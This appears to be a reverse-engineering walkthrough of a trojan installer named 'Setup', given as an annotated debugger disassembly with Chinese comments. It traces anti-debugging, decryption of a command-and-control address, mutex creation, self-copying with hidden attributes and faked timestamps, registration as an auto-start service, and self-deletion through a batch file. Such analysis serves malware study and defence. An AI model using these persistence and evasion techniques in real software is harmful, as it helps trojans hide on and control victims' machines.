004745BC . E8 E721F9FF call Setup.004067A8 ; 这里是一些反调试的东西,锻炼一下手动跟踪能力可以跟进
004745C1 . 33C0 xor eax,eax
004745C3 . 55 push ebp
004745C4 . 68 67494700 push Setup.00474967
004745C9 . 64:FF30 push dword ptr fs:[eax]
004745CC . 64:8920 mov dword ptr fs:[eax],esp
004745CF . E8 A4FBFFFF call Setup.00474178 ; F7跟进
00463982 . A1 10304100 mov eax,dword ptr ds:[413010]
00463987 . E8 84FFF9FF call Setup.00403910 ; 获取一些字符串
0046398C . 8BD8 mov ebx,eax
0046398E . 8B15 AC994700 mov edx,dword ptr ds:[4799AC] ; Setup.00479888
00463994 . 8B12 mov edx,dword ptr ds:[edx] ; (ASCII "SoftWare\Microsoft\Windows\CurrentVersion\Run
00463996 . 8BC3 mov eax,ebx
00463998 . 8B08 mov ecx,dword ptr ds:[eax]
0046399A . FF51 2C call dword ptr ds:[ecx+2C] ; :\Program Files
0046399D . 8D4D F8 lea ecx,dword ptr ss:[ebp-8]
004639A0 . 33D2 xor edx,edx
004639A2 . 8BC3 mov eax,ebx
004639A4 . 8B30 mov esi,dword ptr ds:[eax]
004639A6 . FF56 0C call dword ptr ds:[esi+C] ; SoftWare\Microsoft\Windows\CurrentVersion\Run
004639A9 . 8B55 F8 mov edx,dword ptr ss:[ebp-8]
004639AC . B8 7CB44700 mov eax,Setup.0047B47C
004639B1 . E8 B20DFAFF call Setup.00404768
004639B6 . 8D4D F4 lea ecx,dword ptr ss:[ebp-C]
004639B9 . BA 01000000 mov edx,1
004639BE . 8BC3 mov eax,ebx
004639C0 . 8B30 mov esi,dword ptr ds:[eax]
004639C2 . FF56 0C call dword ptr ds:[esi+C] ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Setup")
004639C5 . 8B55 F4 mov edx,dword ptr ss:[ebp-C]
004639C8 . B8 78B44700 mov eax,Setup.0047B478
004639CD . E8 960DFAFF call Setup.00404768
004639D2 . 8D4D F0 lea ecx,dword ptr ss:[ebp-10]
004639D5 . BA 02000000 mov edx,2
004639DA . 8BC3 mov eax,ebx
004639DC . 8B30 mov esi,dword ptr ds:[eax]
004639DE . FF56 0C call dword ptr ds:[esi+C] ; config
004639E1 . 8B55 F0 mov edx,dword ptr ss:[ebp-10]
004639E4 . B8 74B44700 mov eax,Setup.0047B474
004639E9 . E8 7A0DFAFF call Setup.00404768
004639EE . 8D4D EC lea ecx,dword ptr ss:[ebp-14]
004639F1 . BA 03000000 mov edx,3
004639F6 . 8BC3 mov eax,ebx
004639F8 . 8B30 mov esi,dword ptr ds:[eax]
004639FA . FF56 0C call dword ptr ds:[esi+C]
004639FD . 8B55 EC mov edx,dword ptr ss:[ebp-14]
00463A00 . B8 70B44700 mov eax,Setup.0047B470
00463A05 . E8 5E0DFAFF call Setup.00404768
00463A0A . 8D4D E8 lea ecx,dword ptr ss:[ebp-18]
00463A0D . BA 04000000 mov edx,4
00463A12 . 8BC3 mov eax,ebx
00463A14 . 8B30 mov esi,dword ptr ds:[eax]
00463A16 . FF56 0C call dword ptr ds:[esi+C] ; (ASCII ":\Program Files")
00463A19 . 8B55 E8 mov edx,dword ptr ss:[ebp-18]
00463A1C . B8 6CB44700 mov eax,Setup.0047B46C
00463A21 . E8 420DFAFF call Setup.00404768
00463A26 . 8BC3 mov eax,ebx
00463A28 . E8 13FFF9FF call Setup.00403940
00463A2D . A1 70B44700 mov eax,dword ptr ds:[47B470]
00463A32 . E8 9D11FAFF call Setup.00404BD4
00463A37 . 50 push eax
00463A38 . A1 74B44700 mov eax,dword ptr ds:[47B474]
00463A3D . E8 9211FAFF call Setup.00404BD4
00463A42 . B9 00B54700 mov ecx,Setup.0047B500
00463A47 . 5A pop edx ; "TFrom2"打开资源编辑器可以看到
00463A48 . E8 FBF9FFFF call Setup.00463448 ; F7读取一些加密的配置信息以及加密上线的地址
00463A4D . 84C0 test al,al
00463A4F . 0F84 DF010000 je Setup.00463C34 ; 判断读取是否成功,不成功就OVER了
00463A55 . E8 5631FAFF call <jmp.&kernel32.GetVersion> ; GetVersion
00463A5A . A9 00000080 test eax,80000000
00463A5F . 75 0A jnz short Setup.00463A6B
00463A61 . C705 DC984700>mov dword ptr ds:[4798DC],-1
00463A6B > 8D45 FC lea eax,dword ptr ss:[ebp-4]
00463A6E . E8 BDFDFFFF call Setup.00463830 ; F7,解密出上线地址
0046346F . FF15 AC984700 call dword ptr ds:[4798AC] ; kernel32.FindResourceA
00463475 . 8BD8 mov ebx,eax
00463477 . 85DB test ebx,ebx
00463479 . 74 4A je short Setup.004634C5
0046347B . 90 nop
0046347C . 53 push ebx
0046347D . A1 64A64700 mov eax,dword ptr ds:[47A664]
00463482 . 50 push eax
00463483 . FF15 B0984700 call dword ptr ds:[4798B0] ; kernel32.LoadResource
00463489 . 8BF0 mov esi,eax
0046348B . 85F6 test esi,esi
0046348D . 74 36 je short Setup.004634C5
0046348F . 90 nop
00463490 . 53 push ebx
00463491 . A1 64A64700 mov eax,dword ptr ds:[47A664]
00463496 . 50 push eax
00463497 . FF15 B4984700 call dword ptr ds:[4798B4] ; kernel32.SizeofResource
0046349D . 8BD8 mov ebx,eax
0046349F . 90 nop
004634A0 . 8B45 FC mov eax,dword ptr ss:[ebp-4]
004634A3 . 8BD3 mov edx,ebx
004634A5 . E8 B618FAFF call Setup.00404D60
004634AA . 8B45 FC mov eax,dword ptr ss:[ebp-4]
004634AD . E8 7A17FAFF call Setup.00404C2C
004634B2 . 50 push eax
004634B3 . 56 push esi ; /hResource
004634B4 . E8 8F37FAFF call <jmp.&kernel32.LockResource>; \LockResource
00463864 . E8 430FFAFF call Setup.004047AC ; 解密出:\Program Files
00463869 . EB 76 jmp short Setup.004638E1
0046386B . A1 00334100 mov eax,dword ptr ds:[413300]
00463870 . E8 9B00FAFF call Setup.00403910
00463875 . 8BF0 mov esi,eax
00463877 . 8B45 F8 mov eax,dword ptr ss:[ebp-8]
0046387A . E8 5511FAFF call Setup.004049D4
0046387F . 50 push eax
00463880 . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00463883 . E8 A413FAFF call Setup.00404C2C
00463888 . 8BD0 mov edx,eax
0046388A . 8BC6 mov eax,esi
0046388C . 59 pop ecx
0046388D . E8 F636FBFF call Setup.00416F88
00463892 . 6A 00 push 0
00463894 . 6A 00 push 0
00463896 . 8BC6 mov eax,esi
00463898 . E8 A734FBFF call Setup.00416D44
0046389D . 8BCE mov ecx,esi
0046389F . B2 01 mov dl,1
004638A1 . A1 CC424500 mov eax,dword ptr ds:[4542CC]
004638A6 . E8 7910FFFF call Setup.00454924
004638AB . 8BD8 mov ebx,eax
004638AD . 6A 00 push 0
004638AF . 6A 00 push 0
004638B1 . 8BC3 mov eax,ebx
004638B3 . E8 8C34FBFF call Setup.00416D44
004638B8 . 8BC3 mov eax,ebx
004638BA . 8B10 mov edx,dword ptr ds:[eax]
004638BC . FF12 call dword ptr ds:[edx]
004638BE . 8BD0 mov edx,eax
004638C0 . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004638C3 . E8 9814FAFF call Setup.00404D60
004638C8 . 8BC3 mov eax,ebx
004638CA . 8B10 mov edx,dword ptr ds:[eax]
004638CC . FF12 call dword ptr ds:[edx]
004638CE . 50 push eax
004638CF . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004638D2 . E8 5513FAFF call Setup.00404C2C
004638D7 . 8BD0 mov edx,eax
004638D9 . 8BC3 mov eax,ebx
004638DB . 59 pop ecx
004638DC . 8B38 mov edi,dword ptr ds:[eax]
004638DE . FF57 0C call dword ptr ds:[edi+C]
004638E1 > 8D55 F4 lea edx,dword ptr ss:[ebp-C]
004638E4 . 8B45 F8 mov eax,dword ptr ss:[ebp-8] ; 密钥key放入eax
004638E7 . E8 1CA6FBFF call Setup.0041DF08 ; 解密call,对算法有兴趣的可以跟进,解密出上线地址
004638EC . 8B55 F4 mov edx,dword ptr ss:[ebp-C]
004638EF . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004638F2 . E8 B50EFAFF call Setup.004047AC
004638F7 . 8BC6 mov eax,esi
00463AF2 . E8 8D0EFAFF call Setup.00404984 ; "%ProgramFiles%\Internet Explorer\IEXPLORE.EXE")
00463AF7 . 8B45 DC mov eax,dword ptr ss:[ebp-24]
00463AFA . 8D55 E0 lea edx,dword ptr ss:[ebp-20]
00463AFD . E8 420C0000 call Setup.00464744 ; "C:\Program Files\Internet Explorer\IEXPLORE.EXE")
00463B02 . 8B55 E0 mov edx,dword ptr ss:[ebp-20]
00463B05 . B8 C8B44700 mov eax,Setup.0047B4C8
00463B0A . E8 590CFAFF call Setup.00404768
00463B0F . 8B83 B8010000 mov eax,dword ptr ds:[ebx+1B8]
00463B15 . A3 E8984700 mov dword ptr ds:[4798E8],eax
00463B1A . 0FB743 74 movzx eax,word ptr ds:[ebx+74]
00463B1E . A3 88B44700 mov dword ptr ds:[47B488],eax
00463B23 . 8D55 D8 lea edx,dword ptr ss:[ebp-28]
00463B26 . A1 A8B44700 mov eax,dword ptr ds:[47B4A8]
00463B2B . E8 2859FAFF call Setup.00409458 ; 获取名称
00463B30 . 8B55 D8 mov edx,dword ptr ss:[ebp-28]
00463B33 . B8 ACB44700 mov eax,Setup.0047B4AC
00463B38 . E8 2B0CFAFF call Setup.00404768
00463B3D . 0FB743 76 movzx eax,word ptr ds:[ebx+76]
00463B41 . A3 B4B44700 mov dword ptr ds:[47B4B4],eax
00463B46 . B8 B8B44700 mov eax,Setup.0047B4B8
00463B4B . 8D53 78 lea edx,dword ptr ds:[ebx+78] ; 分组名称
00463BDC . B8 FCB44700 mov eax,Setup.0047B4FC
00463BE1 . 8D93 DF010000 lea edx,dword ptr ds:[ebx+1DF] ; 描述信息
00463BE7 . B9 64000000 mov ecx,64
00463BEC . E8 930DFAFF call Setup.00404984
00463BF1 . B8 F8B44700 mov eax,Setup.0047B4F8
00463BF6 . 8D93 43020000 lea edx,dword ptr ds:[ebx+243] ; 显示名称
004745F5 . E8 DA05F9FF call Setup.00404BD4 ; 复制路径
004745FA . 50 push eax
004745FB . 8D55 EC lea edx,dword ptr ss:[ebp-14]
004745FE . 33C0 xor eax,eax
00474600 . E8 5FE5F8FF call Setup.00402B64 ; 获取自身路径
00474605 . 8B45 EC mov eax,dword ptr ss:[ebp-14]
00474608 . E8 C705F9FF call Setup.00404BD4
0047460D . 50 push eax
0047460E . A1 4C9C4700 mov eax,dword ptr ds:[479C4C]
00474613 . 8B00 mov eax,dword ptr ds:[eax]
00474615 . FFD0 call eax ; kernel32.lstrcmpiA)
00474617 . 85C0 test eax,eax
00474619 . 0F84 CF020000 je Setup.004748EE ; 跳到退出
0047461F . E8 00FCFFFF call Setup.00474224 ; F7
00474224 /nbsp; B9 68424700 mov ecx,Setup.00474268 ; ASCII "SJhensoie23sdsf"
00474229 |. 83CA FF or edx,FFFFFFFF
0047422C |. 33C0 xor eax,eax
0047422E |. E8 2D42FFFF call Setup.00468460 ; 创建互斥体
00468460 /nbsp; 51 push ecx ; /MutexName
00468461 |. 83FA 01 cmp edx,1 ; |
00468464 |. 1BD2 sbb edx,edx ; |
00468466 |. 42 inc edx ; |
00468467 |. 83E2 7F and edx,7F ; |
0046846A |. 52 push edx ; |InitialOwner
0046846B |. 50 push eax ; |pSecurity
0046846C |. FF15 B8984700 call dword ptr ds:[4798B8] ; \CreateMutexA
00468472 \. C3 retn
00474233 |. A3 70C64700 mov dword ptr ds:[47C670],eax
00474238 |. 833D 70C64700>cmp dword ptr ds:[47C670],0
0047423F |. 74 24 je short Setup.00474265
00474241 |. 90 nop
00474242 |. E8 F128F9FF call <jmp.&kernel32.GetLastError> ; [GetLastError
00474247 |. 3D B7000000 cmp eax,0B7
0047424C |. 75 17 jnz short Setup.00474265
0047424E |. A1 70C64700 mov eax,dword ptr ds:[47C670]
00474253 |. 50 push eax ; /hObject => NULL
00474254 |. E8 9727F9FF call <jmp.&kernel32.CloseHandle> ; \CloseHandle
00474259 |. 6A 00 push 0
0047425B |. A1 C49C4700 mov eax,dword ptr ds:[479CC4]
00474260 |. 8B00 mov eax,dword ptr ds:[eax]
00474262 |. FFD0 call eax
00474264 |. 90 nop
00474265 \> C3 retn
004090DC /nbsp; 55 push ebp
004090DD |. 8BEC mov ebp,esp
004090DF |. 81C4 B4FEFFFF add esp,-14C
004090E5 |. 53 push ebx
004090E6 |. 8BD8 mov ebx,eax
004090E8 |. 8D85 B4FEFFFF lea eax,[local.83]
004090EE |. 50 push eax
004090EF |. 8BC3 mov eax,ebx
004090F1 |. E8 DEBAFFFF call Setup.00404BD4
004090F6 |. 50 push eax ; |FileName
004090F7 |. E8 84D9FFFF call <jmp.&kernel32.FindFirstFile>; \FindFirstFileA
004090FC |. 83F8 FF cmp eax,-1
004090FF |. 74 34 je short Setup.00409135
00409101 |. 50 push eax ; /hSearch
00409102 |. E8 71D9FFFF call <jmp.&kernel32.FindClose> ; \FindClose
00409107 |. F685 B4FEFFFF>test byte ptr ss:[ebp-14C],10
0040910E |. 75 25 jnz short Setup.00409135
00409110 |. 8D45 F4 lea eax,[local.3]
00409113 |. 50 push eax ; /pLocalFileTime
00409114 |. 8D85 C8FEFFFF lea eax,[local.78] ; |
0040911A |. 50 push eax ; |pFileTime
0040911B |. E8 48D9FFFF call <jmp.&kernel32.FileTimeToLoc>; \FileTimeToLocalFileTime
00409120 |. 8D45 FC lea eax,[local.1]
00409123 |. 50 push eax ; /pDOSTime
00409124 |. 8D45 FE lea eax,dword ptr ss:[ebp-2] ; |
00409127 |. 50 push eax ; |pDOSDate
00409128 |. 8D45 F4 lea eax,[local.3] ; |
0040912B |. 50 push eax ; |pFileTime
0040912C |. E8 2FD9FFFF call <jmp.&kernel32.FileTimeToDos>; \FileTimeToDosDateTime
00409131 |. 85C0 test eax,eax
00409133 |. 75 07 jnz short Setup.0040913C
00409135 |> C745 FC FFFFF>mov [local.1],-1
0040913C |> 8B45 FC mov eax,[local.1]
0040913F |. 5B pop ebx
00409140 |. 8BE5 mov esp,ebp
00409142 |. 5D pop ebp
00409143 \. C3 retn
004746A8 . /74 6E je short Setup.00474718 ; 判断是否已经自复制
004746AA . |B8 B80B0000 mov eax,0BB8
004746AF . |E8 F8EFFEFF call Setup.004636AC ; 获取开机时间
004746B4 . |6A 00 push 0
004746B6 . |A1 E89B4700 mov eax,dword ptr ds:[479BE8]
004746BB . |8B00 mov eax,dword ptr ds:[eax]
004746BD . |E8 1205F9FF call Setup.00404BD4 ; 获取路径
004746C2 . |50 push eax
004746C3 . |A1 449D4700 mov eax,dword ptr ds:[479D44]
004746C8 . |8B00 mov eax,dword ptr ds:[eax]
004746CA . |FFD0 call eax ; (kernel32.SetFileAttributesA)
004746CC . |A1 E89B4700 mov eax,dword ptr ds:[479BE8]
004746D1 . |8B00 mov eax,dword ptr ds:[eax]
004746D3 . |E8 904CF9FF call Setup.00409368 ; 删除文件
004746D8 . |A1 E89B4700 mov eax,dword ptr ds:[479BE8]
004746DD . |8B00 mov eax,dword ptr ds:[eax]
004746DF . |E8 604AF9FF call Setup.00409144 ; 查找文件
004746E4 . |84C0 test al,al
004746E6 . |74 30 je short Setup.00474718 ; 判断是否存在
004746E8 . |6A 07 push 7
004746EA . |A1 E89B4700 mov eax,dword ptr ds:[479BE8]
004746EF . |8B00 mov eax,dword ptr ds:[eax]
004746F1 . |E8 DE04F9FF call Setup.00404BD4
004746F6 . |50 push eax
004746F7 . |A1 449D4700 mov eax,dword ptr ds:[479D44]
004746FC . |8B00 mov eax,dword ptr ds:[eax]
004746FE . |FFD0 call eax ; SetFileAttributesA)
00474700 . |6A 00 push 0
00474702 . |A1 C49C4700 mov eax,dword ptr ds:[479CC4]
00474707 . |8B00 mov eax,dword ptr ds:[eax]
00474709 . |FFD0 call eax ; kernel32.ExitProcess
00474726 . 50 push eax
00474727 . 8D55 E4 lea edx,dword ptr ss:[ebp-1C]
0047472A . 33C0 xor eax,eax
0047472C . E8 33E4F8FF call Setup.00402B64 ; 获取自身路径
00474731 . 8B45 E4 mov eax,dword ptr ss:[ebp-1C]
00474734 . E8 9B04F9FF call Setup.00404BD4
00474739 . 50 push eax
0047473A . A1 709D4700 mov eax,dword ptr ds:[479D70]
0047473F . 8B00 mov eax,dword ptr ds:[eax] ; (kernel32.CopyFileA)
00474741 . FFD0 call eax ; 动态调用CopyFileA
00474743 . E8 8863F9FF call Setup.0040AAD0 ; 获取时间
0040AAD0 /nbsp; 83C4 E0 add esp,-20
0040AAD3 |. 8D4424 08 lea eax,dword ptr ss:[esp+8]
0040AAD7 |. 50 push eax ; /pLocaltime
0040AAD8 |. E8 63C0FFFF call <jmp.&kernel32.GetLocalTime> ; \GetLocalTime
0047477B . E8 A4E1FEFF call Setup.00462924 ; 修改复制文件时间
00474780 . A1 D89B4700 mov eax,dword ptr ds:[479BD8]
00474785 . 8B00 mov eax,dword ptr ds:[eax]
00474787 . 50 push eax
00474788 . A1 E89B4700 mov eax,dword ptr ds:[479BE8]
0047478D . 8B00 mov eax,dword ptr ds:[eax]
0047478F . E8 4004F9FF call Setup.00404BD4 ; 获取复制后的路径
00474794 . 50 push eax
00474795 . A1 449D4700 mov eax,dword ptr ds:[479D44]
0047479A . 8B00 mov eax,dword ptr ds:[eax]
00462CCC . BA 3F000000 mov edx,3F
00462CD1 . 8B45 F4 mov eax,dword ptr ss:[ebp-C] ; "C:\WINDOWS\*.dat")
00462CD4 . E8 FF65FAFF call Setup.004092D8 ; 查找文件
00462CD9 . 85C0 test eax,eax
00462CDB . 0F85 BB000000 jnz Setup.00462D9C
00462CE1 > 8D85 98FEFFFF lea eax,dword ptr ss:[ebp-168]
00462CE7 . 8B8D A8FEFFFF mov ecx,dword ptr ss:[ebp-158] ; bootstat.dat
00462CED . 8B55 FC mov edx,dword ptr ss:[ebp-4] ; C:\WINDOWS\
00462CF0 . E8 2B1DFAFF call Setup.00404A20 ; "C:\WINDOWS\bootstat.dat")
00462CF5 . 8B85 98FEFFFF mov eax,dword ptr ss:[ebp-168]
00462CFB . E8 44FEFFFF call Setup.00462B44
00462D00 . 84C0 test al,al
00462D02 . 0F84 81000000 je Setup.00462D89
00462D08 . 33C0 xor eax,eax
00462D0A . 55 push ebp
00462D0B . 68 7F2D4600 push Setup.00462D7F
00462D10 . 64:FF30 push dword ptr fs:[eax]
00462D13 . 64:8920 mov dword ptr fs:[eax],esp
00462D16 . 6A 00 push 0
00462D18 . 8D85 94FEFFFF lea eax,dword ptr ss:[ebp-16C]
00462D1E . 8B8D A8FEFFFF mov ecx,dword ptr ss:[ebp-158]
00462D24 . 8B55 FC mov edx,dword ptr ss:[ebp-4]
00462D27 . E8 F41CFAFF call Setup.00404A20
00462D2C . 8B85 94FEFFFF mov eax,dword ptr ss:[ebp-16C] ; "C:\WINDOWS\bootstat.dat")
00462D32 . E8 9D1EFAFF call Setup.00404BD4
00462D37 . 50 push eax ; |FileName
00462D38 . FF15 C0984700 call dword ptr ds:[4798C0] ; \SetFileAttributesA
00462D3E . 8D85 8CFEFFFF lea eax,dword ptr ss:[ebp-174]
00462D44 . 8B8D A8FEFFFF mov ecx,dword ptr ss:[ebp-158]
00462D4A . 8B55 FC mov edx,dword ptr ss:[ebp-4]
00462D4D . E8 CE1CFAFF call Setup.00404A20
00462D52 . 8B85 8CFEFFFF mov eax,dword ptr ss:[ebp-174]
00462D58 . E8 771EFAFF call Setup.00404BD4
00462D5D . 8BD0 mov edx,eax
00462D5F . 8D85 90FEFFFF lea eax,dword ptr ss:[ebp-170]
00462D65 . E8 A21BFAFF call Setup.0040490C
00462D6A . 8B85 90FEFFFF mov eax,dword ptr ss:[ebp-170]
00462D70 . E8 F365FAFF call Setup.00409368 ; deletefile
00462D75 . 33C0 xor eax,eax
00462D77 . 5A pop edx
00462D78 . 59 pop ecx
00462D79 . 59 pop ecx
00462D7A . 64:8910 mov dword ptr fs:[eax],edx
00462D7D . EB 0A jmp short Setup.00462D89
00462D7F .^ E9 5C10FAFF jmp Setup.00403DE0
00462D84 . E8 BF13FAFF call Setup.00404148
00462D89 > 8D85 9CFEFFFF lea eax,dword ptr ss:[ebp-164]
00462D8F . E8 9465FAFF call Setup.00409328 ; 继续查找文件
00462D94 . 85C0 test eax,eax
00462D96 .^ 0F84 45FFFFFF je Setup.00462CE1 ; 循环创建一些.dat文件
00462D9C > 8D85 9CFEFFFF lea eax,dword ptr ss:[ebp-164]
00462DA2 . E8 A565FAFF call Setup.0040934C ; FindClose
004747DB . E8 2491FAFF call Setup.0041D904 ; F7,获取服务名称
0041D948 . E8 6F9EFEFF call <jmp.&advapi32.OpenSCManagerA>
0041D94D . 8BD8 mov ebx,eax
0041D94F . 85DB test ebx,ebx
0041D951 . 74 31 je short Setup.0041D984 判断服务是否存在
0041D953 . 68 FF010F00 push 0F01FF
0041D958 . 8B45 FC mov eax,dword ptr ss:[ebp-4]
0041D95B . E8 7472FEFF call Setup.00404BD4
0041D960 . 50 push eax
0041D961 . 53 push ebx
0041D962 . E8 5D9EFEFF call <jmp.&advapi32.OpenServiceA>
0041D967 . 8BF8 mov edi,eax
0041D969 . 85FF test edi,edi
0041D96B . 74 11 je short Setup.0041D97E
0041D96D . 57 push edi
0041D96E . E8 319EFEFF call <jmp.&advapi32.DeleteService>
0041D973 . BE 01000000 mov esi,1
0041D978 . 57 push edi
0041D979 . E8 0E9EFEFF call <jmp.&advapi32.CloseServiceHandle>
0041D97E > 53 push ebx
0041D97F . E8 089EFEFF call <jmp.&advapi32.CloseServiceHandle>
0041D984 > 85F6 test esi,esi
0041D986 . 7E 06 jle short Setup.0041D98E
0041D988 . C645 FB 01 mov byte ptr ss:[ebp-5],1
0041D98C . EB 04 jmp short Setup.0041D992
0041D98E > C645 FB 00 mov byte ptr ss:[ebp-5],0
0041D992 > 33C0 xor eax,eax
0041D994 . 5A pop edx
0041D995 . 59 pop ecx
0041D996 . 59 pop ecx
0041D997 . 64:8910 mov dword ptr fs:[eax],edx
004747E0 . 68 E8030000 push 3E8 ; 1s
004747E5 . A1 C89B4700 mov eax,dword ptr ds:[479BC8]
004747EA . 8B00 mov eax,dword ptr ds:[eax]
004747EC . FFD0 call eax ; (kernel32.Sleep)
004747EE . A1 FC994700 mov eax,dword ptr ds:[4799FC]
004747F3 . 8B00 mov eax,dword ptr ds:[eax] ; 服务描述
004747F5 . 50 push eax
004747F6 . A1 F09C4700 mov eax,dword ptr ds:[479CF0]
004747FB . 8B00 mov eax,dword ptr ds:[eax] ; 显示名称
004747FD . E8 D203F9FF call Setup.00404BD4
00474802 . 50 push eax
00474803 . A1 249E4700 mov eax,dword ptr ds:[479E24]
00474808 . 8B00 mov eax,dword ptr ds:[eax] ; 服务名称
0047480A . E8 C503F9FF call Setup.00404BD4
0047480F . 8B0D E89B4700 mov ecx,dword ptr ds:[479BE8] ; Setup.0047B4A8
00474815 . 8B09 mov ecx,dword ptr ds:[ecx] ; 自复制后的文件路径
00474817 . 5A pop edx
00474818 . E8 FB8AFAFF call Setup.0041D318 ; F7进去溜达下,创建服务
0041D320 . 57 push edi
0041D321 . 33DB xor ebx,ebx
0041D323 . 895D E0 mov dword ptr ss:[ebp-20],ebx
0041D326 . 895D E4 mov dword ptr ss:[ebp-1C],ebx
0041D329 . 895D EC mov dword ptr ss:[ebp-14],ebx
0041D32C . 894D FC mov dword ptr ss:[ebp-4],ecx ; 取木马目录
0041D32F . 8BFA mov edi,edx ; 显示名称
0041D331 . 8BF0 mov esi,eax ; 服务名称
0041D333 . 8B45 FC mov eax,dword ptr ss:[ebp-4] ; 木马路径放入eax
0041D336 . E8 8978FEFF call Setup.00404BC4 ; 获取描述
0041D33B . 8B45 08 mov eax,dword ptr ss:[ebp+8]
0041D33E . E8 8178FEFF call Setup.00404BC4
0041D343 . 33C0 xor eax,eax
····
····
0041D36F . E8 48A4FEFF call <jmp.&advapi32.OpenSCManagerA> ; OpenSCManagerA>
0041D374 . 8BD8 mov ebx,eax
0041D376 . 85DB test ebx,ebx
0041D378 . 75 2E jnz short Setup.0041D3A8 ; 判断是否打开成功
0041D37A . E8 B997FEFF call <jmp.&kernel32.GetLastError> ; [GetLastError
0041D37F . 8D55 E4 lea edx,dword ptr ss:[ebp-1C]
0041D382 . E8 61ECFEFF call Setup.0040BFE8
0041D387 . 8B4D E4 mov ecx,dword ptr ss:[ebp-1C]
0041D38A . B2 01 mov dl,1
0041D38C . A1 CC7B4000 mov eax,dword ptr ds:[407BCC]
0041D391 . E8 7EF4FEFF call Setup.0040C814
0041D396 . E8 316DFEFF call Setup.004040CC
0041D39B . 33C0 xor eax,eax
0041D39D . 5A pop edx
0041D39E . 59 pop ecx
0041D39F . 59 pop ecx
0041D3A0 . 64:8910 mov dword ptr fs:[eax],edx
0041D3A3 . E9 2D010000 jmp Setup.0041D4D5
0047481D . 84C0 test al,al
0047481F . 75 75 jnz short Setup.00474896 ; 判断是否成功
00474821 . 6A 00 push 0
00474823 . A1 C49C4700 mov eax,dword ptr ds:[479CC4]
00474828 . 8B00 mov eax,dword ptr ds:[eax]
0047482A . FFD0 call eax ; ExitProcess
0047482C . EB 68 jmp short Setup.00474896
0047482E > 8B15 249E4700 mov edx,dword ptr ds:[479E24] ; Setup.0047B4F4
0041D3BA . 50 push eax ; |BinaryPathName
0041D3BB . 6A 00 push 0 ; |ErrorControl = SERVICE_ERROR_IGNORE
0041D3BD . 6A 02 push 2 ; |StartType = SERVICE_AUTO_START
0041D3BF . 68 10010000 push 110 ; |ServiceType = SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS
0041D3C4 . 68 FF010F00 push 0F01FF ; |DesiredAccess = SERVICE_ALL_ACCESS
0041D3C9 . 57 push edi ; |DisplayName
0041D3CA . 56 push esi ; |ServiceName
0041D3CB . 53 push ebx ; |hManager
0041D3CC . E8 CBA3FEFF call <jmp.&advapi32.CreateServiceA> ; \CreateServiceA
0041D3D1 . 8945 F4 mov dword ptr ss:[ebp-C],eax
0041D3D4 . 837D F4 00 cmp dword ptr ss:[ebp-C],0
0041D3D8 . 75 2E jnz short Setup.0041D408
0041D3DA . E8 5997FEFF call <jmp.&kernel32.GetLastError> ; [GetLastError
0041D3DF . 8D55 E0 lea edx,dword ptr ss:[ebp-20]
0041D465 . E8 56C3FEFF call Setup.004097C0 ; 循环拷贝描述字符串
0041D46A . 8B45 F0 mov eax,dword ptr ss:[ebp-10]
0041D46D . 50 push eax
0041D46E . 6A 01 push 1
0041D470 . 8B45 F4 mov eax,dword ptr ss:[ebp-C]
0041D473 . 50 push eax
0041D474 . A1 089E4700 mov eax,dword ptr ds:[479E08]
0041D479 . 8B00 mov eax,dword ptr ds:[eax]
0041D47B . FFD0 call eax ; (advapi32.ChangeServiceConfig2A)
0041D4AF . 8B45 F4 mov eax,dword ptr ss:[ebp-C]
0041D4B2 . 50 push eax
0041D4B3 . E8 3CA3FEFF call <jmp.&advapi32.StartServiceA> ; StartServiceA
0041D4B8 . 8B45 F4 mov eax,dword ptr ss:[ebp-C]
0041D4BB . 50 push eax
0041D4BC . E8 CBA2FEFF call <jmp.&advapi32.CloseServiceHandle>
0041D4C1 . 33C0 xor eax,eax
0041D4C3 . 5A pop edx
0041D4C4 . 59 pop ecx
0041D4C5 . 59 pop ecx
0047481F . /75 75 jnz short Setup.00474896 ; 判断是否创建成功,不成功就exit了
00474821 . |6A 00 push 0
00474823 . |A1 C49C4700 mov eax,dword ptr ds:[479CC4]
00474828 . |8B00 mov eax,dword ptr ds:[eax]
0047482A . |FFD0 call eax ; ExitProcess
0047482C . |EB 68 jmp short Setup.00474896
0047482E > |8B15 249E4700 mov edx,dword ptr ds:[479E24] ; Setup.0047B4F4
00474834 . |8B12 mov edx,dword ptr ds:[edx]
00474836 . |33C0 xor eax,eax
004748A3 . /75 20 jnz short Setup.004748C5 ; 判断是否提示,要选上这项就XXXX。。。
004748A5 . |803D 74C64700>cmp byte ptr ds:[47C674],0
004748AC . |75 17 jnz short Setup.004748C5
004748AE . |6A 40 push 40
004748B0 . |68 78494700 push Setup.00474978 ; ASCII "wo shi mu ma"
004748B5 . |68 84494700 push Setup.00474984 ; ASCII "installed successfully"
004748BA . |6A 00 push 0
004748BC . |A1 B09B4700 mov eax,dword ptr ds:[479BB0]
004748C1 . |8B00 mov eax,dword ptr ds:[eax]
004748C3 . |FFD0 call eax
004748C5 > \A1 949A4700 mov eax,dword ptr ds:[479A94]
004748CD . /74 12 je short Setup.004748E1
004748CF . |8D55 E0 lea edx,dword ptr ss:[ebp-20] ; 描述
004748D2 . |33C0 xor eax,eax
004748D4 . |E8 8BE2F8FF call Setup.00402B64 ; 获取自身路径
00402B7A |. /75 1E jnz short Setup.00402B9A
00402B7C |. |68 05010000 push 105 ; /BufSize = 105 (261.)
00402B81 |. |8D4424 04 lea eax,dword ptr ss:[esp+4] ; |
00402B85 |. |50 push eax ; |PathBuffer
00402B86 |. |6A 00 push 0 ; |hModule = NULL
00402B88 |. |E8 27E7FFFF call <jmp.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA
00402B8D |. |8BC8 mov ecx,eax
00402B8F |. |8BD4 mov edx,esp
00402B91 |. |8BC3 mov eax,ebx
00402B93 |. |E8 6C1C0000 call Setup.00404804
00402B98 |. |EB 1E jmp short Setup.00402BB8
00402B9A |> \E8 F5E6FFFF call <jmp.&kernel32.GetCommandLineA> ; [GetCommandLineA
004748D9 . |8B45 E0 mov eax,dword ptr ss:[ebp-20]
004748DC . |E8 4F39FFFF call Setup.00468230 ; F7进去自删除,创建个bat自删除,经典啊!
00468296 . 68 DC834600 push Setup.004683DC ; .bat
0046829B . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
